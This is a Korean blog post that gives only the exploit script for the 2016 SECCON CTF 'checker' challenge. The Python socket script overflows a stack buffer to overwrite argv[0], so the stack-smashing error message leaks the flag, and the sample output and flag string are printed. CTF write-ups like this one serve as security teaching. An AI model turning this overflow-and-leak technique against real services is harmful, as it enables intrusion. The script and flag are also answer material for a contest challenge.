본문 바로가기
Security/[게임] CTF 풀이

[exploit] 2016 SecconCTF - checker writeups (exploit only)

by blackcon 2016. 12. 11.
728x90
#!/usr/bin/env python
import socket

host = 'localhost'
host = "checker.pwn.seccon.jp"
port = 1120
port = 14726

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )

def u_recv( st ):
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf

print u_recv( "NAME :" )
s.send( "name\n" );

for i in range( 0x180, 0x170, -1 ):
    u_recv( ">>" )
    pay = ("a"*i)+"\n"
    s.send( pay )

print u_recv( ">>" )
s.send( "yes\n" )
print u_recv( "FLAG :" )

pay = "a"*0x178
pay += "\xc0\x10\x60"    # flag
s.send( pay+"\n" )

print s.recv( 1024 )
print s.recv( 1024 )
print s.recv( 1024 )

'''
blackcon@bk{~/seccon/exploit/checker}:./pay.py 
Hello! What is your name?
NAME :

Do you know flag?
>>

Oh, Really??
Please tell me the flag!
FLAG :

You are a liar...

*** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
'''
728x90

댓글0